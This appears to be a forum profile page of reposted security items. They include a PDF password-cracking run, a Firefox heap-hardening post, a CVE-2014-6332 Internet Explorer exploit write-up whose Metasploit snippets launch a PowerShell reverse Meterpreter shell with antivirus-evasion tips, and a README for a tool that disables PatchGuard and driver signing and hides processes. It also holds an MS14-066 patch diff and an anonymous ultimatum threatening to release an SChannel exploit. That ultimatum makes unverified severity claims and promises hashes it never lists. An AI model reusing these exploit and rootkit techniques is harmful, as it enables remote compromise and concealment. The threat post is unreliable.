Everything posted by Nytro
-
Cracking password protected PDF documents

We just started with the work on oclHashcat to support cracking of password protected PDF. There are 5-6 different versions, but for PDF versions 1.1 - 1.3, which use RC4-40 (and we have a fast RC4 cracking kernel), we can already summarize:

Guaranteed to crack every password protected PDF of format v1.1 - v1.3, regardless of the password used
All existing documents at once, as there's no more salt involved after the key is computed
In less than 4 hours (single GPU)!!

Here's what the output looks like:

root@et:~/oclHashcat-1.32# ./oclHashcat64.bin -w3 -m 10410 hash -a 3 ?b?b?b?b?b
oclHashcat v1.32 starting...

Device #1: Tahiti, 3022MB, 1000Mhz, 32MCU
Device #2: Tahiti, 3022MB, 1000Mhz, 32MCU
Device #3: Tahiti, 3022MB, 1000Mhz, 32MCU

Hashes: 1 hashes; 1 unique digests, 1 unique salts
Bitmaps: 8 bits, 256 entries, 0x000000ff mask, 1024 bytes
Applicable Optimizers:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt
* Brute-Force
Watchdog: Temperature abort trigger set to 90c
Watchdog: Temperature retain trigger set to 80c
Device #1: Kernel ./amd/m10410_a3.cl (21164 bytes)
Device #1: Kernel ./amd/markov_le_v1.cl (9208 bytes)
Device #1: Kernel ./amd/bzero.cl (887 bytes)
Device #2: Kernel ./amd/m10410_a3.cl (21164 bytes)
Device #2: Kernel ./amd/markov_le_v1.cl (9208 bytes)
Device #2: Kernel ./amd/bzero.cl (887 bytes)
Device #3: Kernel ./amd/m10410_a3.cl (21164 bytes)
Device #3: Kernel ./amd/markov_le_v1.cl (9208 bytes)
Device #3: Kernel ./amd/bzero.cl (887 bytes)

$pdf$1*2*40*-4*1*16*c015cff8dbf99345ac91c84a45667784*32*1f300cd939dd5cf0920c787f12d16be22205e?55a5bec5c9c6d563ab4fd0770d7*32*9a1156c38ab8177598d1608df7d7e340ae639679bd66bc4cd?a9bc9a4eedeb170:$HEX[db34433720]

Session.Name...: oclHashcat
Status.........: Cracked
Input.Mode.....: Mask (?b?b?b?b?b) [5]
Hash.Target....: $pdf$1*2*40*-4*1*16*c015cff8dbf99345ac91c84a45667784*32*1f300cd939dd5cf0920c787f12d16be22205e?55a5bec5c9c6d563ab4fd0770d7*32*9a1156c38ab8177598d1608df7d7e340ae639679bd66bc4cd?a9bc9a4eedeb170
Hash.Type......: PDF 1.3 (Acrobat 2, 3, 4) + collider-mode #1
Time.Started...: Fri Nov 7 16:05:44 2014 (19 mins, 42 secs)
Speed.GPU.#1...: 85019.7 kH/s
Speed.GPU.#2...: 85010.9 kH/s
Speed.GPU.#3...: 84962.4 kH/s
Speed.GPU.#*...: 255.0 MH/s
Recovered......: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.......: 301050363904/1099511627776 (27.38%)
Skipped........: 0/301050363904 (0.00%)
Rejected.......: 0/301050363904 (0.00%)
HWMon.GPU.#1...: 99% Util, 38c Temp, 25% Fan
HWMon.GPU.#2...: 99% Util, 39c Temp, 27% Fan
HWMon.GPU.#3...: 99% Util, 38c Temp, 27% Fan

Started: Fri Nov 7 16:05:44 2014
Stopped: Fri Nov 7 16:25:29 2014

Sursa: https://hashcat.net/forum/thread-3818.html
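As a sanity check on the claim: the ?b?b?b?b?b mask enumerates all 256^5 = 1,099,511,627,776 candidates (exactly the Progress total shown), and the quoted per-GPU speed makes "less than 4 hours (single GPU)" work out. A quick back-of-the-envelope calculation, using only speeds taken from the output above:

```python
# Sanity-check of the "< 4 hours (single GPU)" claim, using only numbers
# quoted in the output (speeds are taken from the Speed.GPU lines, in H/s).

KEYSPACE = 256 ** 5            # ?b?b?b?b?b = every 40-bit RC4 key
SINGLE_GPU = 85_019_700        # Speed.GPU.#1: 85019.7 kH/s
ALL_GPUS = 255_000_000         # Speed.GPU.#*: 255.0 MH/s

def hours_to_exhaust(rate_hs):
    """Worst-case time to walk the whole keyspace at a given rate."""
    return KEYSPACE / rate_hs / 3600

print(KEYSPACE)                                # 1099511627776, the Progress total
print(round(hours_to_exhaust(SINGLE_GPU), 2))  # ~3.6 h on one GPU
print(round(hours_to_exhaust(ALL_GPUS), 2))    # ~1.2 h on all three
```

The run shown cracked the password at 27.38% of the keyspace, and 301050363904 / 255 MH/s is about 19.7 minutes, which matches the reported 19 mins, 42 secs.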
-
Partitioned heap in Firefox, part 1

Published 15 Oct 2014

This post is meant to share some of the progress I've made in my current project at Mozilla, which I've been working on for about two months now. In short, the goal of this project is to use heap partitioning as a countermeasure for attacks based on use-after-free bugs, and in what follows, I'll (briefly) go over what we're trying to guard against, then proceed to explain what we're planning to do about it.

Use-after-free bugs and how they're exploited

Having very little security experience prior to taking this project, the first thing I did was spend a few days understanding how use-after-free bugs are exploited. As it turns out, they're often an essential part of attacks against browsers, given how malicious Javascript code can get the browser engine to perform arbitrary allocations while being executed. In particular, if any script gets a chance to run after an object is freed, but before it is (mistakenly) used again, then that script could attempt to allocate, say, an ArrayBuffer in that free'd memory region. In a simplistic scenario, if that allocation succeeds - and, with a deterministic memory allocator, chances are it will succeed - an attacker could overwrite the free'd object's vtable to control the execution flow of the browser when a method of the compromised object is next invoked.

While studying this, I found this description of a Firefox vulnerability found during Pwn2Own 2014 and this write-up on a WebKit exploit to be particularly useful. In the former, an ArrayBuffer is corrupted to leak some interesting memory addresses (thus bypassing Address Space Layout Randomization), which are then used to form a ROP payload that is entered after a jump is made to an address kept in memory that is used after being free'd. In the latter, a truly mindblowing sequence of steps is employed to overwrite the vtable of a free'd then used object.
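The allocator predictability this attack relies on can be illustrated with a toy size-class allocator (a deliberately simplified model, not mozjemalloc's actual policy): freeing a chunk puts it on a per-size free list, and the next same-size allocation pops it, so an attacker-controlled buffer lands exactly where the freed object lived.

```python
# Toy size-class allocator illustrating why use-after-free is exploitable:
# the most recently freed chunk of a size class is the first one reused.
# A simplified model for illustration, not the real allocator.

class ToyAllocator:
    def __init__(self):
        self.next_addr = 0x1000
        self.free_lists = {}           # size -> LIFO stack of freed addresses

    def malloc(self, size):
        freed = self.free_lists.get(size)
        if freed:                      # reuse a freed chunk first...
            return freed.pop()
        addr = self.next_addr          # ...otherwise carve fresh memory
        self.next_addr += size
        return addr

    def free(self, addr, size):
        self.free_lists.setdefault(size, []).append(addr)

heap = ToyAllocator()
victim = heap.malloc(64)     # browser object with a vtable pointer
heap.free(victim, 64)        # object freed, but a dangling pointer remains
attacker = heap.malloc(64)   # script allocates, e.g., an ArrayBuffer of the same size
print(attacker == victim)    # True: attacker data now sits under the dangling pointer
```

When the browser later calls a virtual method through the dangling pointer, it reads a "vtable" the attacker wrote.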
Heap partitioning as a countermeasure

Attacks based on use-after-free bugs basically hinge on the predictability of the memory allocator: an attacker must be reasonably confident that triggering a memory allocation of the same size as a chunk of memory that was just free'd will cause the allocator to return that very same chunk. Thus, an effective way to counter these attacks is to partition the heap such that allocations that may be controlled by an attacker will never reuse memory that was previously allocated to internal browser objects. Specifically, Javascript objects that cause buffers to be allocated (and whose memory contents can be arbitrarily manipulated by an attacker), such as ArrayBuffers, should be allocated from an entirely separate memory pool than the rest of the browser engine. This approach has been implemented in other browsers to various extents, and Gecko already does partition a restricted set of objects, in addition to poisoning freed memory to help catch use-after-free bugs. However, despite being very effective, segregating entire classes of objects doesn't come without cost: there's a very real risk of increasing memory fragmentation, and thus memory usage, which is something we've extensively tweaked in the past and care a lot about.

A word on memory allocators

After studying the available options, we came up with two alternatives for implementing heap partitioning - tweaking the existing allocator, or replacing it with Blink's PartitionAlloc. Firefox currently uses an allocator dubbed mozjemalloc, a modified version of the jemalloc allocator. It is not too difficult to understand its inner workings by reading the code and stepping through some allocations with a debugger, but I also found a Phrack article about jemalloc to be a valuable resource. As a bonus, the article is written from an attacker's perspective, which is good for "knowing-your-enemy" purposes.
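The partitioning countermeasure itself can be sketched with a toy model (purely illustrative; jemalloc3 exposes this through arenas and PartitionAlloc through partitions): each partition gets its own free lists and address range, so a "script" allocation can never land in a chunk freed from the "internal" partition.

```python
# Toy model of heap partitioning: separate free lists and address ranges
# per partition, so attacker-reachable allocations never reuse chunks
# freed by internal browser objects. Illustrative only.

class PartitionedHeap:
    def __init__(self, partitions):
        # partitions: name -> base address of that partition's range
        self.pools = {name: {"next": base, "free": {}}
                      for name, base in partitions.items()}

    def malloc(self, part, size):
        pool = self.pools[part]
        freed = pool["free"].get(size)
        if freed:                      # reuse only within the same partition
            return freed.pop()
        addr = pool["next"]
        pool["next"] += size
        return addr

    def free(self, part, addr, size):
        self.pools[part]["free"].setdefault(size, []).append(addr)

heap = PartitionedHeap({"internal": 0x10000, "script": 0x80000})
victim = heap.malloc("internal", 64)   # internal browser object
heap.free("internal", victim, 64)      # freed; dangling pointer may remain
evil = heap.malloc("script", 64)       # attacker-controlled ArrayBuffer
print(evil != victim)                  # True: the internal chunk is never handed out
```

The fragmentation worry mentioned above falls out of this model too: each partition keeps its own pile of free chunks that the other partition cannot use.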
While it is not too hard to tweak mozjemalloc so it uses different partitions, we're currently in the process of updating our allocator back to unmodified jemalloc (aka jemalloc3), so it's more sensible to implement partitioning on top of jemalloc3 instead of mozjemalloc. Plus, jemalloc3 provides handy API calls that can be used for partitioning, which is less intrusive than what we'd need to do with mozjemalloc. PartitionAlloc (PA for short), on the other hand, is built from the ground up with partitioning in mind, and while it will certainly cause a lot more integration woes than jemalloc3, it's definitely worth experimenting with. Given that it's an off-the-shelf solution for partitioning, I haven't bothered too much with understanding how it works yet, nor have I found any references about it aside from the code itself.

Building up to the experiments

After taking in all that new information, it became apparent that there was a lot of work to be done on both fronts - jemalloc3 and PA - up until the milestone where we'd get some data to compare them and pick the winner. The JS engine folks advised me that the simplest way to get some experimental data for memory usage would be to not try to allocate specific objects in a separate partition, but rather to separate all engine allocations from the rest of the browser. Given that the buffers we're interested in isolating account for most of the memory used by SpiderMonkey, this would give us a good approximation of the final results without having to worry too much about their hierarchy of memory functions. Thus, I spent the following weeks attempting to create two builds: one in which SpiderMonkey allocates from a separate jemalloc3 partition from the rest of Gecko, and another in which it allocates from PA, with jemalloc3 being used for the rest of Gecko.
The latter may sound odd (that's because it is), but it proved to be a lot easier than replacing the allocator for all of Gecko with PA, and I believe it is enough for comparison purposes. Additionally, I began working on the jemalloc3 transition by helping upstream some changes that had been made on mozjemalloc (bug 801536). As an interesting aside, the PA builds unveiled several violations of the JS engine API in which the memory allocators used by Gecko and SpiderMonkey were mixed (for instance, attempting to free from one of them memory that was allocated from the other), all over the code. I fixed all that I could find.

Experiments

We have a great tool for measuring Firefox's memory footprint under realistic loads called Are We Slim Yet?, which I'll refer to as AWSY for brevity. Once the necessary builds were ready, the next step was to run them through AWSY and see how they performed.

[Graph - columns, left to right: jemalloc3 with partition, mozjemalloc, jemalloc3 without partition, PartitionAlloc + jemalloc3 Frankenbuild]

The graph above shows RSS, the main metric we're interested in - the amount of physical memory used by Firefox - in four different builds. From left to right: jemalloc3 with a separate partition for SpiderMonkey, an unmodified build using mozjemalloc, jemalloc3 without a separate partition, and jemalloc3 with PartitionAlloc for SpiderMonkey. The complete AWSY run has all the results, but it also shows pretty obviously that the in-browser memory accounting is broken with PartitionAlloc, so it's best to constrain our analysis to RSS.

Conclusions and next steps

Despite the iffiness of the jemalloc3 + PartitionAlloc Frankenbuild, the experimental evidence shows that:

1. There's no reason to expect PartitionAlloc's memory footprint to be much better than jemalloc3's
2. Partitioning jemalloc3 should introduce little additional memory overhead
3. jemalloc3 regresses significantly when compared with mozjemalloc

Given the difficulty in integrating PartitionAlloc and conclusion 1 above, the takeaway is that the best way forward is to give up on PartitionAlloc for now and invest in jemalloc3, which we're more than halfway through transitioning to anyway. Of course, should our jemalloc3 solution prove insufficient for any reason, we now also have evidence that PartitionAlloc is a worthy contender for the future. Conclusion 2 gives us some confidence that going with jemalloc3 will not cause Firefox's memory usage to skyrocket, but conclusion 3, for which there is a known bug, is a bit more worrying, so I'll investigate that next.

Acknowledgements

Special thanks to Daniel Veditz, Mike Hommey, Nicholas Nethercote, Terrence Cole, Steven Fink and John Schoenick for contributing to and guiding me through the various parts of these experiments.

Sursa: might as well hack it | Partitioned heap in Firefox, part 1
-
CVE-2014-6332: it’s raining shells
Nytro posted a topic in Reverse engineering & exploit development
CVE-2014-6332: it's raining shells

This is a shared post by me (@wez3forsec) and Rik van Duijn (@rikvduijn)

Today @yuange tweeted a proof of concept for CVE-2014-6332. CVE-2014-6332 is a critical Internet Explorer vulnerability that was patched with MS14-064. The PoC was able to execute the application notepad.exe. We wanted to pop some actual shells with this, so the race began to find a way of executing more than just notepad or calc. The "great" thing is that this vulnerability affects everything from Windows 95 + IE 3.0 to Windows 10 + IE 11; from a pentester's perspective this is awesome, from a blue team perspective this will make you cry.

CVE-2014-6332 alliedve.htm 404???? allie(win95+ie3-win10+ie11) dve copy by yuange in 2009. — yuange (@yuange75) 12 november 2014

We wanted to pop shells, which is why we created a Metasploit module; this allows us to adapt our exploit when needed and gives us the usability of the Metasploit framework, including the ability to start lots of different payloads supported by the framework. To start the payloads, we decided to use Powershell. This has some advantages: Powershell is, for example, useful for bypassing anti-virus software, because it is able to inject payloads directly into memory. Next to this, on newer versions of Windows we were unable to even run cmd.exe or other commands like ipconfig. Fun fact: application whitelisting usually whitelists Powershell, so use more Powershell!

The original exploit runs the notepad.exe file in order to prove it was able to execute code. We modified this in order to execute powershell.exe and inject a meterpreter into memory. First we modified the HTML page so it's easy to handle within ruby, then we added powershell.exe in order to see if it would actually execute.

def on_request_uri(cli, request)
  payl = cmd_psh_payload(payload.encoded,"x86",{ :remove_comspec => true })
  payl.slice! "powershell.exe "

The above code generates a complete Powershell one-liner for a payload; we are using a reverse_tcp meterpreter shell, but it could use something else.

function runmumaa()
On Error Resume Next
set shell=createobject("Shell.Application")
shell.ShellExecute "powershell.exe", "#{payl}", "", "open", 1
end function

The magic runmumaa() function: after safe mode is disabled this function is called and the actual shell is executed using the earlier generated Powershell payload. In the short time available to us we were unable to figure out how the exploit actually works; the function setnotsafemode() seems to do the heavy lifting.

Let's see if we are able to pop a shell, shall we? First we set up our exploit: we added our module to the /usr/share/metasploit-framework/modules/exploit/windows/browser/ folder using the name ms14_064_ie_olerce.rb. The module has various options which need to be configured; as stated earlier, we used a reverse_tcp meterpreter payload. Next we started our handler and, using Internet Explorer, navigated to the URL; we see a quick popup from Powershell but it disappears quickly. Checking netstat we see a connection to port 80 from the process "system" to our Kali VM. Checking Metasploit we see we have gained a shell and are now able to execute system commands; maybe try out that fancy new privilege escalation exploit (exploit/windows/local/ms14_058_track_popup_menu) and use Mimikatz to read passwords in plaintext :).

Remember, this is a quick and dirty POC; Metasploit devs are probably yelling at their screens telling us how this is not how to build a proper module. They are right! But it works, and with some work this could be a full-fledged Metasploit module. The Metasploit module can be found here: ms14_064_ie_olerce.rb

Please note: make sure to have the latest Metasploit installed.
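The one-liner trick the module relies on can be reproduced by hand: PowerShell's -EncodedCommand flag takes a Base64 string of the UTF-16LE-encoded script, which is how an arbitrary payload gets packed onto a single command line. A simplified illustration (not the module's exact code; the flags shown are standard PowerShell options):

```python
import base64

def psh_one_liner(script):
    """Pack a PowerShell script into a single -EncodedCommand invocation.
    PowerShell expects Base64 over the UTF-16LE bytes of the script."""
    b64 = base64.b64encode(script.encode("utf-16-le")).decode("ascii")
    return f"powershell.exe -NoProfile -WindowStyle Hidden -EncodedCommand {b64}"

cmd = psh_one_liner('Write-Output "hello"')
print(cmd)
```

Because the whole script travels as one opaque argument, it survives being passed through ShellExecute in the VBScript above without any quoting headaches.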
For more details about the vulnerability: IBM X-Force Researcher Finds Significant Vulnerability in Microsoft Windows

Sursa: https://forsec.nl/2014/11/cve-2014-6332-internet-explorer-msf-module/

-
DisPG

This is proof-of-concept code to encourage security researchers to examine PatchGuard more by showing actual code that disables PatchGuard at runtime. It does the following things:

disarms PatchGuard on certain patch versions of XP SP2, Vista SP2, 7 SP1 and 8.1 at run-time.
disables Driver Signing Enforcement and allows you to install an arbitrary unsigned driver so that you can examine the x64 kernel using kernel patch techniques if you need.
hides processes whose names start with 'rk' to demonstrate that PatchGuard is being disarmed.

See NOTE.md for implementation details.

Demo

This is how it is supposed to work.

Installation

Configuring x64 Win8.1

Install x64 Win8.1 (editions should not matter). Using a virtual machine is strongly recommended.
Apply all Windows Updates.
Enable test signing:
  Launch a command prompt with Administrator privilege.
  Execute the following commands.
    > bcdedit /copy {current} /d "Test Signing Mode"
    The entry was successfully copied to {xxxx}.
    > bcdedit /set {xxxx} TESTSIGNING ON
Copy the \x64\Release folder to the test box (the location should not matter).
Shutdown Windows.
(Optional) Take a snapshot if you are using a VM.

Getting Ready for Execution

Boot Windows in "Test Signing Mode" mode.
Execute Dbgview with Administrator privilege and enable Capture Kernel.

Executing and Monitoring

Run DisPGLoader.exe with Administrator privilege and an internet connection so that it can download debug symbols. You should see the following messages:

FFFFF8030A2F8D10 : ntoskrnl!ExAcquireResourceSharedLite
...
Loading the driver succeeded.
Press any key to continue . . .

And you should also see the following messages in DebugView:

[ 4: 58] Initialize : Starting DisPG.
[ 4: 58] Initialize : PatchGuard has been disarmed.
[ 4: 58] Initialize : Hiding processes has been enabled.
[ 4: 58] Initialize : Driver Signing Enforcement has been disabled.
[ 4: 58] Initialize : Enjoy freedom
[ 4: 10c] PatchGuard xxxxxxxxxxxxxxxx : blahblahblah.
[ 4: 10c] PatchGuard yyyyyyyyyyyyyyyy : blahblahblah.

Each output with 'PatchGuard' shows execution of validation by PatchGuard, yet none of them should cause a BSOD because it has been disarmed. xxxxxxxxxxxxxxxx and yyyyyyyyyyyyyyyy are addresses of PatchGuard contexts. They may or may not change each time, but after rebooting Windows, you will see different patterns, as most of the random factors are decided at boot time. Note that you will see different output when you run the code on Windows 7, Vista and XP because the implementation of the disarming code for them is completely different.

(Optional) Start any process whose name starts with 'rk' and confirm that it is not listed in Task Manager or similar tools.
(Optional) Keep Windows running at least 30 minutes to confirm PatchGuard was really disabled.

When you reboot Windows, DisPG will not be reloaded automatically.

Uninstallation

It cannot be stopped and removed at runtime as it is just concept code. In order to uninstall DisPG, reboot Windows and simply delete all the files you copied.

Tested Platforms

Windows 8.1 x64 (ntoskrnl.exe versions: 17085, 17041, 16452)
Windows 7 SP1 x64 (ntoskrnl.exe versions: 18409, 18247)
Windows Vista SP2 x64 (ntoskrnl.exe versions: 18881)
Windows XP SP2 x64 (ntoskrnl.exe versions: 5138)

License

This software is released under the MIT License, see LICENSE.

Sursa: https://github.com/tandasat/PgResarch/tree/master/DisPG
-
Windows Phone security sandbox survives Pwn2Own unscathed

Microsoft phone coughs up cookies, but full compromise fails.

by Dan Goodin - Nov 13 2014, 5:20pm

Microsoft's Windows Phone emerged only partially scathed from this year's Mobile Pwn2Own hacking competition after a contestant failed to fully pierce its defenses. A blog post from Hewlett-Packard, whose Zero Day Initiative organizes the contest, provided only sparse details. Nonetheless, the account appeared to show Windows Phone largely surviving. An HP official wrote:

First, Nico Joly—who refined his competition entry on the very laptop he won at this spring's Pwn2Own in Vancouver as part of the VUPEN team—was the sole competitor to take on Windows Phone (the Lumia 1520) this year, entering with an exploit aimed at the browser. He was successfully able to exfiltrate the cookie database; however, the sandbox held and he was unable to gain full control of the system.

No further details were immediately available. HP promised to provide more color about hacks throughout the two-day contest in the coming weeks, presumably after companies have released patches. The Windows Phone attack came during day two of the mobile hacking contest. During day one, an iPhone 5S, Samsung Galaxy S5, LG Nexus 5, and Amazon Fire Phone were all fully hijacked. More details are here.

Sursa: Windows Phone security sandbox survives Pwn2Own unscathed | Ars Technica
-
This Is How ATMs Get Hacked in Russia: Using Explosives

Jamie Condliffe | Filed to: security

Forget super-skinny card skimmers and clever malware attacks. In Russia, many of the attempts to illegally obtain cash from ATMs are rather more crude—because they involve explosives.

English Russia points out that more than 20 Russian ATMs have been blown up recently in an attempt to steal money. The site reports that criminals pump the cash dispensers with propane, which they then ignite—in the process tearing the machines apart with brute force. The explosions can send debris up to 50 meters from the ATM. It clearly works: the perpetrators typically make off with 2,500,000 rubles, or around $50,000, at a time. [English Russia]

Sursa: This Is How ATMs Get Hacked in Russia: Using Explosives
-
MS14-066 schannel.dll diff (Windows 2003 SP2)

@@ -29399,13 +29399,13 @@
 int __stdcall SPVerifySignature(HCRYPTPROV hProv, int a2, ALG_ID Algid, BYTE *pbData, DWORD dwDataLen, BYTE *pbEncoded, DWORD cbEncoded, int a8)
 {
   signed int v8; // esi@4
-  BOOL v9; // eax@8
+  BOOL v9; // eax@9
   DWORD v10; // eax@14
-  DWORD pcbStructInfo; // [sp+Ch] [bp-3Ch]@11
+  DWORD pcbStructInfo; // [sp+Ch] [bp-3Ch]@13
   HCRYPTKEY phKey; // [sp+10h] [bp-38h]@1
   HCRYPTHASH phHash; // [sp+14h] [bp-34h]@1
   BYTE *pbSignature; // [sp+18h] [bp-30h]@1
-  char pvStructInfo; // [sp+1Ch] [bp-2Ch]@11
+  char pvStructInfo; // [sp+1Ch] [bp-2Ch]@13

   phKey = 0;
   phHash = 0;
@@ -29416,39 +29416,40 @@
   if ( !pbSignature )
   {
     v8 = -2146893056;
-    goto LABEL_18;
+    goto LABEL_20;
   }
-  if ( !CryptImportKey(hProv, *(const BYTE **)a2, *(_DWORD *)(a2 + 4), 0, 0, &phKey)
-    || !CryptCreateHash(hProv, Algid, 0, 0, &phHash) )
-    goto LABEL_12;
-  v9 = a8 ? CryptHashData(phHash, pbData, dwDataLen, 0) : CryptSetHashParam(phHash, 2u, pbData, 0);
-  if ( !v9 )
-    goto LABEL_12;
-  if ( *(_DWORD *)(*(_DWORD *)a2 + 4) == 8704 )
+  if ( CryptImportKey(hProv, *(const BYTE **)a2, *(_DWORD *)(a2 + 4), 0, 0, &phKey)
+    && CryptCreateHash(hProv, Algid, 0, 0, &phHash) )
   {
-    pcbStructInfo = 40;
-    if ( !CryptDecodeObject(1u, (LPCSTR)0x28, pbEncoded, cbEncoded, 0, &pvStructInfo, &pcbStructInfo) )
+    v9 = a8 ? CryptHashData(phHash, pbData, dwDataLen, 0) : CryptSetHashParam(phHash, 2u, pbData, 0);
+    if ( v9 )
     {
-LABEL_12:
-      GetLastError();
-      v8 = 3;
-      goto LABEL_18;
+      if ( *(_DWORD *)(*(_DWORD *)a2 + 4) != 8704 )
+      {
+        ReverseMemCopy((unsigned int)pbSignature, (int)pbEncoded, cbEncoded);
+LABEL_18:
+        v8 = CryptVerifySignatureA(phHash, pbSignature, cbEncoded, phKey, 0, 0) != 0 ? 0 : -2147483391;
+        goto LABEL_20;
+      }
+      pcbStructInfo = 40;
+      if ( CryptDecodeObject(1u, (LPCSTR)0x28, pbEncoded, cbEncoded, 0, &pvStructInfo, &pcbStructInfo) )
+      {
+        v10 = pcbStructInfo;
+        if ( pcbStructInfo > cbEncoded )
+          goto LABEL_15;
+        qmemcpy(pbSignature, &pvStructInfo, pcbStructInfo);
+        cbEncoded = v10;
+        goto LABEL_18;
+      }
     }
-    v10 = pcbStructInfo;
-    qmemcpy(pbSignature, &pvStructInfo, pcbStructInfo);
-    cbEncoded = v10;
   }
-  else
-  {
-    ReverseMemCopy((unsigned int)pbSignature, (int)pbEncoded, cbEncoded);
-  }
-  v8 = CryptVerifySignatureA(phHash, pbSignature, cbEncoded, phKey, 0, 0) != 0 ? 0 : -2147483391;
-  }
-  else
-  {
-    v8 = -1;
+  GetLastError();
+LABEL_15:
+  v8 = 3;
+  goto LABEL_20;
   }
-LABEL_18:
+  v8 = -1;
+LABEL_20:
   if ( phKey )
     CryptDestroyKey(phKey);
   if ( phHash )
@@ -29458,7 +29459,7 @@
   return v8;
 }

Sursa: https://gist.github.com/hmoore-r7/01a2940edba33f19dec3
-
# I need a good doxbin onion back! Software SUCKS!

Calling out "SChannel Shenanigans"
Part one of the in depth story of MS14-666 / CVE-2014-6321

So, about those "SChannel Shenanigans"... Sit down and let me set the record straight! This is the story of the most under-played Patch Tuesday update ever delivered. The "SChannel Shenanigans" bug is a once in a lifetime type of vulnerability, and Microsoft is mis-representing the scope and severity of this defect. This is also the story of an opportunity lost by indecision; learn from my fail! And while software sucks, you can mitigate harsh reality with defense in depth and consistent care. Yes, this vulnerability must be called "SChannel Shenanigans" or the wrath of "The Exploit" be upon you and your house!

Some background to understand this discussion:

def Lsa...() { }

^- This is easy code, like for a "Function or Method Definition", or said another way, 'the instructions the computer carries out'. From here simply called "Methods".

Attack surface and call graph describe how complicated, and how frequently, a particular function may be called. The more complicated or prominently used the code, the larger the attack surface is. The more frequently a function is called, the larger the risk it carries if compromised. From here simply called "Surface".

Privileges and capabilities are the "keys" the vulnerable process carries, which in turn can be stolen and used for more attacks if that process is compromised. These privileges, as held by Operating System and Platform Services processes and methods, are what give you access to everything: data stored, transmitted, remote services or networks, everything. From here simply referred to as "Privs" for short.

What makes "SChannel Shenanigans" so dangerous?

A number of things, combined, make this defect exceptionally dangerous to everyone running Windows 2000 and newer. As hinted at with the first vulnerable version, the code affected is very old and very complicated.
Old code with very large Surface explains the first aspect of risk. Next is the remote exposure of the huge Surface to attackers who may remain anonymous. This impact at a distance, before verifying credentials or permitting access, is the second aspect of risk. Finally, the frequent and pervasive use of the vulnerable Lsa Methods in all versions of affected Windows means there are many avenues to 100% success of SYSTEM Privs. Sometimes called "God Mode" exploits when utilized to take over systems. It is as if our story code had been written like:

< inside vulnerable SYSTEM Services >

def SYSTEM/AdministratorMainLoop() {
  while always {
    runService();
    handleEvents();
  }
}

def runService() {
  while always {
    contactRemoteServiceMaybe();   // calls vulnerable Lsa Method
    handleLocalRequestMaybe();     // calls vulnerable Lsa Method
  }
}

def handleEvents() {
  while always {
    acceptShadyInputsFromStrangers();  // calls vulnerable Lsa Method
    passThroughShadyToOthers();        // calls vulnerable Lsa Method
  }
}

< inside vulnerable applications >

def insideEveryApplicationOnWindows() {
  doAnyCryptoStuff();  // calls vulnerable Lsa Method; may be sandbox/restricted - doChain();
}

Exploits through remote services like RDP, IIS, ActiveDirectory (LDAP), MSSQL, are pivots to the rest of your critical infrastructure. Exploits through event handling yield Privs. Exploits through least privileged sandboxed processes can in turn incur Lsa Method calls in processes with Privs, including guest virtual machines on a Windows host running VMWare or VirtualBox. In every way, this was one of those rare vulnerabilities in just the right place, giving a "God Mode" so effective you begin to question your own sanity. Thus when tracing through a confirmed exploitable call to the vulnerable Lsa Method, and another, and another, it begins to dawn on me just how dangerous this exploit is. It cannot be sold, without falling into wrong hands. It cannot be Full Disclosure'd, without creating pandemonium.
It cannot be used without the utmost caution, lest it be stolen by an observer. In fact, talking about it makes me nervous, so let's just call it "The Exploit" and you are sworn to secrecy until we... Well, what the hell do we do with it? Sadly, this is as far as we'll get in the background portion of the first part of our tale.

To sum up each amplifying risk factor for "SChannel Shenanigans":

a.) Before authentication. Methods called early on in many, many applications and libraries and services. Surface exposed to any attackers, and early.
b.) Always results in SYSTEM Privs, local or remote. A "God Mode" exploit with 100% success.
c.) Multiplicity of use and high exposure of flawed code. Huge Surface; everything including Windows 2000 onward is vulnerable.
d.) Legacy code carried onward, forever. This means modern protections that make exploiting Methods more difficult are not applied here. No EMET for you here, foolish Earth Human!

And finally, an ultimatum or two. I did not know what to do with this before, but I do know what to do now given Microsoft's response to these defects.

Microsoft has until the end of day Friday the 14th to change the MS14-066 Exploitability Assessment to "0 - Exploitation Detected". If they do not, I will anonymously distribute "The Exploit".
Microsoft has until this time next month, December 16th, to release a patch for legacy XP customers also affected by this vulnerability. Additional time is granted given the overhead of build and test for a new platform on short notice.

TL;DR:
- Pre-auth remote exec and local Priv escalate in SChannel by 1 or more from year 2011 onward.
- Every organization should run a Secure Drop for hot defect reports.
- Microsoft owes their customers full disclosure and accurate risk guidance for MS14-066.
- Microsoft owes XP legacy users a proper fix, too. With same four new cipher suites.
- Assume all software is vulnerable, defend with depth and know how to recover.

Langsec Coreboot Qubes FTW!

P.S.
Some of you may be skeptical; that's fine. I know all about you, my dear #infosec. The following code cleaned versions of Win2K sources listed are sha256sum hashed and as follows:

private/security/schannel/lsa/bullet.c
private/security/schannel/lsa/callback.c
private/security/schannel/lsa/credapi.c
private/security/schannel/lsa/ctxtapi.c
private/security/schannel/lsa/ctxtattr.c
private/security/schannel/lsa/debug.c
private/security/schannel/lsa/events.c
private/security/schannel/lsa/init.c
private/security/schannel/lsa/libmain.c
private/security/schannel/lsa/mapper.c
private/security/schannel/lsa/package.c
private/security/schannel/lsa/spreg.c
private/security/schannel/lsa/stubs.c
private/security/schannel/lsa/userctxt.c
private/security/schannel/lsa/usermode.c
private/security/schannel/spbase/asn1enc.c
private/security/schannel/spbase/cache.c
private/security/schannel/spbase/capi.c
private/security/schannel/spbase/cert.c
private/security/schannel/spbase/certmap.c
private/security/schannel/spbase/ciphfort.c
private/security/schannel/spbase/cliprot.c
private/security/schannel/spbase/context.c
private/security/schannel/spbase/cred.c
private/security/schannel/spbase/debug.c
private/security/schannel/spbase/defcreds.c
private/security/schannel/spbase/keyxfort.c
private/security/schannel/spbase/keyxmsdh.c
private/security/schannel/spbase/keyxmspk.c
private/security/schannel/spbase/oidenc.c
private/security/schannel/spbase/pct1cli.c
private/security/schannel/spbase/pct1msg.c
private/security/schannel/spbase/pct1pckl.c
private/security/schannel/spbase/pct1srv.c
private/security/schannel/spbase/protutil.c
private/security/schannel/spbase/rng.c
private/security/schannel/spbase/sigfort.c
private/security/schannel/spbase/sigsys.c
private/security/schannel/spbase/specmap.c
private/security/schannel/spbase/srvprot.c
private/security/schannel/spbase/ssl2cli.c
private/security/schannel/spbase/ssl2msg.c
private/security/schannel/spbase/ssl2pkl.c
private/security/schannel/spbase/ssl2srv.c
private/security/schannel/spbase/ssl3.c
private/security/schannel/spbase/ssl3key.c
private/security/schannel/spbase/ssl3msg.c
private/security/schannel/spbase/tls1key.c
private/security/schannel/utillib/enc.c
private/security/schannel/utillib/keys.c
